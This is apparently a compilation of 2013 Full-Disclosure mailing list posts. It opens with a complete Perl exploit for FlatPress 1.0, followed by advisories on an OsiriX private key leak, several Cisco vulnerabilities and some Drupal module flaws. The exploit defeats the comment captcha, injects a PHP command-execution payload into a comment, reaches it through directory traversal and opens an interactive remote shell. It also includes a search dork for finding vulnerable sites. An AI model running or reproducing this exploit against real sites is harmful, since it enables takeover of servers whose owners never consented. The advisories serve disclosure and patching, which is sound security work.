[Full-disclosure] Flatpress version 1.0 remote code execution NULLday
#!/usr/bin/perl
# Exploit Title: Flatpress remore code execution PoC NULLday
# Google Dork: This site is powered by FlatPress.
# Date: 17/10/2013
# Exploit Author: Wireghoul
# Vendor Homepage: http://flatpress.org/home/
# Software Link:
http://downloads.sourceforge.net/project/flatpress/flatpress/FlatPress%201.0%20Solenne/flatpress-1.0-solenne.tar.bz2
# Version: v1.0
#
# Blended threat, executes code injected into comment
# by loading comment as a page through directory traversal
# Requires the inlinePHP plugin to be enabled.
# Written by @Wireghoul - justanotherhacker.com
#
# This is for my peeps and the freaks in the front row -- Hilltop Hoods:
Nosebleed section
use strict;
use warnings;
use LWP::UserAgent;
banner;
usage if (!$ARGV[0]);
my $injid = 'Spl0ited'.int(rand());
my $ua = LWP::UserAgent-new;
$ua-timeout(10);
$ua-env_proxy;
$ua-cookie_jar({ file = tmp/flatpress-rce.txt });
sub banner {
print \nFlatpress remote code execution PoC by \@Wireghoul\n;
print ===[ justanotherhacker.com]==\n;
}
sub usage {
print Usage: $0 url\n;
exit;
}
my $response =
$ua-get($ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php);
if (!$response-is_success) {
print [-] Inline PHP plugin not found at
$ARGV[0]/fp-plugins/inlinephp/plugin.inlinephp.php\n;
} else {
print [+] Inline PHP plugin found, hopefully it is enabled!\n;
}
# Prepare for exploitation, find entry + comment location
$response = $ua-get($ARGV[0]);
if ($response-is_success) {
if ($response-decoded_content =~
/(http.*?x=entry:entry.*?;comments:1#comments)/) {
my $cmntlink = $1;
print [+] Found comment link: $cmntlink\n;
my $aaspam = 0; # Can't be bothered solving easy captchas, just
reload page until we get one we like
while ($aaspam == 0) {
$response = $ua-get($cmntlink);
if ($response-decoded_content =~ /strong(\d+) plus (\d+) \?
\(\*\)/) {
$aaspam = $1+$2;
print [+] Defeated antispam $1 + $2 = $aaspam\n;
} else {
$response-decoded_content =~ m/strong(.*) \? \(\*\)/;
print [*] Unknown antispam: $1 ... retrying\n;
}
}
# Post a comment
$response = $ua-post(
$cmntlink.form,
Content = {
'name' = $injid,
'email' = '',
'url' = '',
'aaspam' = $aaspam,
'content' =
SHELL[exec]system(\$_GET['cmd']);[/exec]LLEHS,
'submit' = 'Add',
}
);
$response = $ua-get($cmntlink);
# Find link to injected content, then execute psuedo shell in loop
my @cmnts = split (/li id=comment/, $response-decoded_content);
my @injected = grep /$injid/, @cmnts;
if ($injected[0] =~ /$injid/) {
print [+] Injection ($injid) successful\n;
$injected[0] =~
m/(http.*?)x=entry:entry(\d\d)(\d\d)(\d\d-\d+);comments:1#comment(\d+-\d+)/;
my
$shell=$1page=../../content/$2/$3/entry$2$3$4/comments/comment$5;
print [*] Dropping into shell, type exit to exit\n;
my $line='';
while (1) {
print '$';
$line=STDIN;
if ($line =~ /^exit$/) { exit; };
my $output=$ua-get($shellcmd=$line);
$output-decoded_content =~ /SHELL(.*)LLEHS/ms;
my $clean = $1; $clean =~ s/br \///g;
print $clean\n;
}
} else {
print '[-] Unable to identify the injection point';
}
} else {
print [-] Comment link not found\n;
}
} else {
die $response-status_line;
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CVE-2013-4425: Private key disclosure, Osirix (lite, 64bit and FDA cleader version) (Medical Application)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Private key disclosure, Osirix (lite, 64bit and FDA cleader version) CVE-2013-4425 (version 1.09) CVSS Score: 8.4 Background: === OsiriX is an image processing software dedicated to DICOM images (files with a .dcm / .DCM extension) produced by imaging equipment (MRI, CT, PET, PET-CT, SPECT-CT, Ultrasounds) commonly used in medical settings. Certain versions are FDA or otherwise approved for clinical/medical use. The product is normally configured to connect to a Picture Archiving and Communication System (PACS) over the network; using protocols such as DICOM and the HTTP(s) based WADO. These connections are commonly secured with Transport Layer Security (TLS). OsiriX requires a public private key pair in order to do so (X509 certificate and corresponding private key). Required Environment: = This advisory only applies to OsiriX installations which use TLS for securing their network connection in conjuction with a strong digital identity (e.g. a medical-care account, pass, medical-id). Vulnerability: == During startup of the DICOM listener the private key is extracted (from the generally well protected/encrypted keychain, chip-card or similarly), copied and then written to a file on the file system. Then it is perfunctory encrypted with a password that is hardcoded to 'SuperSecretPassword'. The resulting file (and the entire (directory) path) have read permissions which are totally open (user, group and other). This means that other users, daemons or subsystems on the same workstation as OsiriX, systems that have mounted/visibility of the path; or systems that are able to put a symbolic link in the path, can obtain the private key. Details: The private and public key are extracted and written out as a temporary PKCS#12 file (through NSData writeToFile:). This file is then passed to the (hardcoded) path /usr/bin/openssl; where openssl its subcommand 'pkcs12' is used to split the file into a PEM encoded public and private key (fopen(2) with permissive O_NOFOLLOW, O_SYMLINK). The latter is perfunctory encrypted with 'SuperSecretPassword'. This password is visible in the binary and passed as a command line parameter (i.e. visible to 'ps(1)') during execution. The PKCS#12 is then removed. The various write operations honour things such as tilde expansion and (symbolic) links; thus allowing a fair degree of control for the attacker to re-position the file on a visible location (shared volume, a local webserver, a java(script)/browser visible location, an internet cache). Especially as the path itself is also writable for user, group and other. Impact: === Full disclosure of the users private key. And hence full negation of any and all privacy and authentication security measures of the TLS channel. The attacker can impersonate the user and/or decrypt (past) communications. As it is common in medical settions to use a single (personal) x509 certificate for enterprise/hospital wide authentication and privacy protection; the attacker will also gain access to all other systems thus protected. Work around or mitigation for existing installations: = None (other than disabling the use of TLS/security). Solution: = Mitigate by Upgrading to version 5.8.2 or 2.5-MD. As per version 5.8/2.5-MD, vendor no longer uses the hardcoded 'SuperSecretPassword', but instead generates dynamic token which is held in in-process memory; and otherwise not saved directly. Therefore upgrading to U2.5-MD mitigates this issues. This is documented in the vendors release notes as: [MD-670] - CVE-2013-4425 : Private key disclosure, Osirix Note that this mitigation does not address subsequent security issues such as the VM paging these out, inter process memory visibility and so on). Furthermore, during execution of the /usr/bin/openssl command; the password is part of the command line and hence visible to tools such as 'ps(1)' to all users on the system. This fix has not yet been propagated to the unsupported open-source version; and no timeline for this is available at the time of this release. Versions affected: == All versions up to and including 5.7.1/2.7-MD The fix was introduced in version 5.8 and 2.8-MD. Vendor contact: Pixmeo SARL 266 Rue de Bernex CH-1233 Bernex Switzerland Caveats and Vendor certifications affected: === OsiriX MD is cleared as a 510k class II medical device, according to US Food And Drug Regulation CFR21 part 820 (http://www.accessdata.fda.gov/cdrh_docs/pdf10/K101342.pdf). OsiriX MD complies with European Directive 93/42/EEC concerning medical devices. Under this directive, it is regarded as a class IIa (CE-0029, Apra Gaz, Bruxelles, Belgium) product. Both these certifications set out
[Full-disclosure] Cisco Security Advisory: Cisco TelePresence VX Clinical Assistant Administrative Password Reset Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Cisco Security Advisory: Cisco TelePresence VX Clinical Assistant Administrative Password Reset Vulnerability Advisory ID: cisco-sa-20131106-tvxca Revision 1.0 For Public Release 2013 November 6 16:00 UTC (GMT) +- Summary === A vulnerability in the WIL-A module of Cisco TelePresence VX Clinical Assistant could allow an unauthenticated, remote attacker to log in as the admin user of the device using a blank password. The vulnerability is due to a coding error that resets the password for the admin user to a blank password on every reboot. An attacker could exploit this vulnerability by logging in to the administrative interface as the admin user with a blank password. Cisco has released free software updates that address this vulnerability. This advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20131106-tvxca -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.20 (Darwin) iF4EAREKAAYFAlJ6S/QACgkQUddfH3/BbTpvJwD/WFsZrxKrAKmjuxaPITDpWlMY RyGikVNS4XpD6f5P7fwA/iwMBIteU5dteXuNSXolMd0qAOoZ+IfUw8YtzHWzKlAm =6h/7 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cisco Security Advisory: Cisco IOS Software Session Initiation Protocol Denial of Service Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Cisco Security Advisory: Cisco IOS Software Session Initiation Protocol Denial of Service Vulnerability Advisory ID: cisco-sa-20131106-sip Revision 1.0 For Public Release 2013 November 6 16:00 UTC (GMT) +- Summary === A vulnerability exists in the Session Initiation Protocol (SIP) implementation in Cisco IOS Software that could allow an unauthenticated, remote attacker to cause a reload of an affected device or cause memory leaks that may result in system instabilities. To exploit this vulnerability, affected devices must be configured to process SIP messages. Limited Cisco IOS Software releases are affected. Cisco has released free software updates that address this vulnerability. There are no workarounds for devices that must run SIP; however, mitigations are available to limit exposure to the vulnerability. This advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20131106-sip -BEGIN PGP SIGNATURE- Version: GnuPG/MacGPG2 v2.0.20 (Darwin) iF4EAREKAAYFAlJ6S+MACgkQUddfH3/BbTo0OQD/QYkqdRWe1T2Wthrd+gJ78hcu FqJ3qA3OytQgNvtypg4A/3Ekbsl6PitW3C93b0anTlBnyX8EHjpQZMuzUeJakkQI =qkpl -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cisco Security Advisory: Cisco WAAS Mobile Remote Code Execution Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Cisco Security Advisory Cisco WAAS Mobile Remote Code Execution Vulnerability Advisory ID: cisco-sa-20131106-waasm Revision 1.0 For Public Release 2013 November 6 16:00 UTC (GMT) +-- Summary === Cisco Wide Area Application Services (WAAS) Mobile contains a vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary code on the Cisco WAAS Mobile server with the privileges of the Microsoft Internet Information Services (IIS) web server. Cisco has released free software updates that address this vulnerability. This advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20131106-waasm -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (SunOS) iFcDBQFSekRGUddfH3/BbToRCN00AQCADPIVyRY3IlQWUP8airNTGgvEoUSldfEV 7PSc77PgsQD+NAhj1b/5GuHgYgGGGB3ue79dG6wNmAkkb48RJ5Eehs8= =C2oN -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-087 - Payment for Webform - Access Bypass
View online: https://drupal.org/node/2129373 * Advisory ID: DRUPAL-SA-CONTRIB-2013-087 * Project: Payment for Webform [1] (third-party module) * Version: 7.x * Date: 2013-November-06 * Security risk: Not critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - This module enables you to ask for or require payments before users can submit webforms. It previously allowed anonymous users to sometimes use other anonymous users' payments when submitting a form. Payment for Webform never supported anonymous users, but there was also nothing that prevented them from using the Webform component. This vulnerability is mitigated by the fact that an attacker must be anonymous and that other anonymous users must have made payments that have not been used for submitting a webform yet. It does not compromise sites' security, nor does it allow anonymous users to do anything they would not have been able to do, if they had made a payment themselves. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Payment for Webform 7.x-1.x versions prior to 7.x-1.5. Drupal core is not affected. If you do not use the contributed Payment for Webform [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Payment for Webform module for Drupal 7.x, upgrade to 7.x-1.5 [5] Additionally, if you have any forms that use the component and are accessible to anonymous users, you may need to update those to prevent form validation errors. Also see the Payment for Webform [6] project page. REPORTED BY - * Herman van Rink [7] (helmo) * Clemens Tolboom [8] (clemens.tolboom) * Greg Knaddison [9] (greggles) of the security team FIXED BY * Bart Feenstra [10] (Xano), the module maintainer COORDINATED BY -- * Greg Knaddison [11] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [12]. Learn more about the Drupal Security team and their policies [13], writing secure code for Drupal [14], and securing your site [15]. [1] http://drupal.org/project/payment_webform [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/payment_webform [5] https://drupal.org/node/2128345 [6] http://drupal.org/project/payment_webform [7] https://drupal.org/user/449000 [8] https://drupal.org/user/125814 [9] https://drupal.org/user/36762 [10] https://drupal.org/user/62965 [11] http://drupal.org/user/36762 [12] http://drupal.org/contact [13] http://drupal.org/security-team [14] http://drupal.org/writing-secure-code [15] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-089 - Node Access Keys - Access Bypass
View online: https://drupal.org/node/2129379 * Advisory ID: DRUPAL-SA-CONTRIB-2013-089 * Project: Node Access Keys [1] (third-party module) * Version: 7.x * Date: 2013-November-06 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Access bypass DESCRIPTION - Node Access Keys helps to grant users temporary view permissions to selected content types on a per user role basis. However, it only implements hook_node_access() and not hook_query_alter(), which means any listing of nodes does not respect the node view access. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Node Access Keys 7.x-1.0. Drupal core is not affected. If you do not use the contributed Node Access Keys [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Node Access Keys module for Drupal 7.x, upgrade to Node Access Keys 7.x-1.1 [5] Also see the Node Access Keys [6] project page. REPORTED BY - * Daniel Korte [7] the module maintainer FIXED BY * Daniel Korte [8] the module maintainer COORDINATED BY -- * Greg Knaddison [9] of the Drupal Security Team * Ben Jeavons [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/nodeaccesskeys [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/nodeaccesskeys [5] https://drupal.org/node/2125239 [6] http://drupal.org/project/nodeaccesskeys [7] http://drupal.org/user/453668 [8] http://drupal.org/user/453668 [9] http://drupal.org/user/36762 [10] http://drupal.org/user/91990 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Security-news] SA-CONTRIB-2013-088 - Secure Pages - Missing Encryption of Sensitive Data
View online: https://drupal.org/node/2129381 * Advisory ID: DRUPAL-SA-CONTRIB-2013-088 * Project: Secure Pages [1] (third-party module) * Version: 6.x * Date: 2013-November-06 * Security risk: Less critical [2] * Exploitable from: Remote * Vulnerability: Missing Encryption of Sensitive Data DESCRIPTION - The Secure Pages module manages redirects between HTTP and HTTPS pages. A flaw in the URL path matching could lead some pages and forms to be transmitted via plain HTTP, even if the administrator intended those pages to use HTTPS. This flaw may surface either due to a malicious user enticing a user to land on a specially constructed page or through normal interactions with the site. CVE IDENTIFIER(S) ISSUED * /A CVE identifier [3] will be requested, and added upon issuance, in accordance with Drupal Security Team processes./ VERSIONS AFFECTED --- * Secure Pages 6.x-2.x versions prior to 6.x-2.0. Drupal core is not affected. If you do not use the contributed Secure Pages [4] module, there is nothing you need to do. SOLUTION Install the latest version: * If you use the Secure Pages module for Drupal 6.x, upgrade to Secure Pages 6.x-2.0 [5] Also see the Secure Pages [6] project page. REPORTED BY - * Balazs Nagykekesi [7] FIXED BY * Balazs Nagykekesi [8] * Dylan Tack [9] of the Drupal Security Team, module maintainer COORDINATED BY -- * Klaus Purer [10] of the Drupal Security Team CONTACT AND MORE INFORMATION The Drupal security team can be reached at security at drupal.org or via the contact form at http://drupal.org/contact [11]. Learn more about the Drupal Security team and their policies [12], writing secure code for Drupal [13], and securing your site [14]. [1] http://drupal.org/project/securepages [2] http://drupal.org/security-team/risk-levels [3] http://cve.mitre.org/ [4] http://drupal.org/project/securepages [5] https://drupal.org/node/2128739 [6] http://drupal.org/project/securepages [7] http://drupal.org/user/21231 [8] http://drupal.org/user/21231 [9] http://drupal.org/user/96647 [10] http://drupal.org/user/262198 [11] http://drupal.org/contact [12] http://drupal.org/security-team [13] http://drupal.org/writing-secure-code [14] http://drupal.org/security/secure-configuration ___ Security-news mailing list security-n...@drupal.org Unsubscribe at http://lists.drupal.org/mailman/listinfo/security-news ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
